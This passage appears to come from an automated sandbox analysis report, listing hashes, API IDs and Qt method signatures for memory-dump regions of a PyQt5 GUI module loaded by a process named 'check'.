                                                                                                                                                                                                                • Instruction ID: 2ee4494aded4fcbd81fbe89427bfce17f23290eaeb079d7768c01454091bdb81
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1bf213333af16b4cc60e7c214b236e661136d5e9e35e064c5a442c5af3d30c6f
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4951E576A08F4699EB608F61E8842ED37B8FB48B88F544576DE8D13B28DF38D549C740
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ?addEllipse@PainterPath@@$F@@@PointRect
                                                                                                                                                                                                                • String ID: BJ1dd$BJ9$Bdddd$QPainterPath$addEllipse$addEllipse(self, rect: QRectF)addEllipse(self, x: float, y: float, w: float, h: float)addEllipse(self, center: Union[QPointF, QPoint], rx: float, ry: float)
                                                                                                                                                                                                                • API String ID: 2918516624-3440497614
                                                                                                                                                                                                                • Opcode ID: ea9bfd8e78bec367f063be4639763e19d2f4536506a359ae907263ba0bf15dcc
                                                                                                                                                                                                                • Instruction ID: a950abaafffe1d73430d94005fa6c200da5df4da07063b377079910b0caa5caf
                                                                                                                                                                                                                • Opcode Fuzzy Hash: ea9bfd8e78bec367f063be4639763e19d2f4536506a359ae907263ba0bf15dcc
                                                                                                                                                                                                                • Instruction Fuzzy Hash: A051E2B6609F46D9DB60CF34E8802AA33B8FB89788F505276EA4D47B28DF38D155C710
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ?matches@Bool_Err_Event@@FromKey@LongOccurredSequence@@@Standard
                                                                                                                                                                                                                • String ID: 1J8
                                                                                                                                                                                                                • API String ID: 1744163412-4168894884
                                                                                                                                                                                                                • Opcode ID: 9e46db3686c42256c1caf7b4d8bd204558bc87d273a1e217d3e48bc2f7eb5c39
                                                                                                                                                                                                                • Instruction ID: ef7e168a41852c18e17465272abe153344c873d9c96340abeaec26290d342a8a
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9e46db3686c42256c1caf7b4d8bd204558bc87d273a1e217d3e48bc2f7eb5c39
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 54314DA9A0CB5281EB608F65F44006AB774FB86B94F5444B2DF8D13B68DF7CD485D700
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Rect$?eraseF@@@Painter@@Rect@Rect@@@
                                                                                                                                                                                                                • String ID: BJ9$Biiii$QPainter$eraseRect$eraseRect(self, a0: QRectF)eraseRect(self, rect: QRect)eraseRect(self, x: int, y: int, w: int, h: int)
                                                                                                                                                                                                                • API String ID: 2523673470-3519423170
                                                                                                                                                                                                                • Opcode ID: caa5fd5c8f1d3e75545223f36e7360a7377eda0de07bac4e0704c946713cc40b
                                                                                                                                                                                                                • Instruction ID: 6cf019736c9851eaa814662b9b3d7f90e1343036c03090c04e1f2536aff3df36
                                                                                                                                                                                                                • Opcode Fuzzy Hash: caa5fd5c8f1d3e75545223f36e7360a7377eda0de07bac4e0704c946713cc40b
                                                                                                                                                                                                                • Instruction Fuzzy Hash: C8510676619F46D9EB60CF34E8902E933A8FB49B88F545276EA4D43B28EF38D155C700
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • ?insertRow@QStandardItem@@QEAAXHAEBV?$QList@PEAVQStandardItem@@@@@Z.QT5GUI ref: 00007FFB9A351B50
                                                                                                                                                                                                                • ?insertRow@QStandardItem@@QEAAXHPEAV1@@Z.QT5GUI ref: 00007FFB9A351BFF
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Standard$?insertItem@@Row@$Item@@@@@List@V1@@
                                                                                                                                                                                                                • String ID: BiJ3$BiJ:$QStandardItem$insertRow$insertRow(self, row: int, items: Iterable[QStandardItem])insertRow(self, arow: int, aitem: Optional[QStandardItem])
                                                                                                                                                                                                                • API String ID: 1324998375-2342085720
                                                                                                                                                                                                                • Opcode ID: 78bcdde13c35d34ade6d95a11ac12409132ab41da8f4522610fe512a8700e2f7
                                                                                                                                                                                                                • Instruction ID: 83c1bd554bdeec2abfbda480e81b4fbe0372b8bef8d069201ce19f588212c349
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 78bcdde13c35d34ade6d95a11ac12409132ab41da8f4522610fe512a8700e2f7
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9F4136B6618F8681EB60CF61E8881AE73A8FB89B84F514176CA9D43724DF3DD449C740
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Brush@@Format@@SurfaceV0@@$?format@Window@@
                                                                                                                                                                                                                • String ID: QWindow$format$format(self) -> QSurfaceFormat
                                                                                                                                                                                                                • API String ID: 3398123277-2872225233
                                                                                                                                                                                                                • Opcode ID: 452d04ecb1dac621049442443a89a2f238008f587689e14a4782cb4659b55dc9
                                                                                                                                                                                                                • Instruction ID: 0e2aeb71bd71c9752f6aebfa827d723cf89a72fc22bd3d00361254248ed94859
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 452d04ecb1dac621049442443a89a2f238008f587689e14a4782cb4659b55dc9
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5C3149A1708B4681EB609B25E8481AA77A9EF85BC4F544071DE8E43764DF6CE089D700
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Err_$ClearLong_OccurredVoid
                                                                                                                                                                                                                • String ID: Bii|P0$QStandardItemModel$createIndex$createIndex(self, row: int, column: int, object: Any = None) -> QModelIndex
                                                                                                                                                                                                                • API String ID: 89242240-3839368874
                                                                                                                                                                                                                • Opcode ID: cbbfed5397f9271a267e78a1c124a35b2db617ee14828de433fefa6e03ea89db
                                                                                                                                                                                                                • Instruction ID: 2a7e9f51235ae7de35c2ec07600b3350bb770eb094f233ef51e5d3ad52777858
                                                                                                                                                                                                                • Opcode Fuzzy Hash: cbbfed5397f9271a267e78a1c124a35b2db617ee14828de433fefa6e03ea89db
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 90314CB6B09B5285EB20CF21E4883AD37A8FB49780F56817ACA9D03320DF3CD498C750
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Variant@@$?setFormat@@List@@@Property@StringTextVariant@@@
                                                                                                                                                                                                                • String ID: BJ1$QTextCharFormat$setFontFamilies$setFontFamilies(self, families: Iterable[Optional[str]])
                                                                                                                                                                                                                • API String ID: 2160437431-2972902074
                                                                                                                                                                                                                • Opcode ID: 638554b5b6b0e67c153ef2bcdba53bc352e54532c96e0c18f86735c5db56c108
                                                                                                                                                                                                                • Instruction ID: b86d02fc6f7d070919b84d3fc32d4e966bfb839c603710711ec76328605b2d0a
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 638554b5b6b0e67c153ef2bcdba53bc352e54532c96e0c18f86735c5db56c108
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6831F5B6B08F9681EB60CF65E8881A933B8FB49B84FA14176CA5D43724DF3CD549C740
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Eval_Thread$?sender@Object@@RestoreSave
                                                                                                                                                                                                                • String ID: QDoubleValidator$qtcore_qobject_sender$sender$sender(self) -> Optional[QObject]
                                                                                                                                                                                                                • API String ID: 10903585-2772519645
                                                                                                                                                                                                                • Opcode ID: 68b8db9e18bc0a87ffa48f4b0ff0b1ba1b9fcb9a72ca79803255c5c48f2ee483
                                                                                                                                                                                                                • Instruction ID: b812a87bc4dd59db8239bb86fa3f7f7a12a90c96a3f0c7893f140d795b0637e3
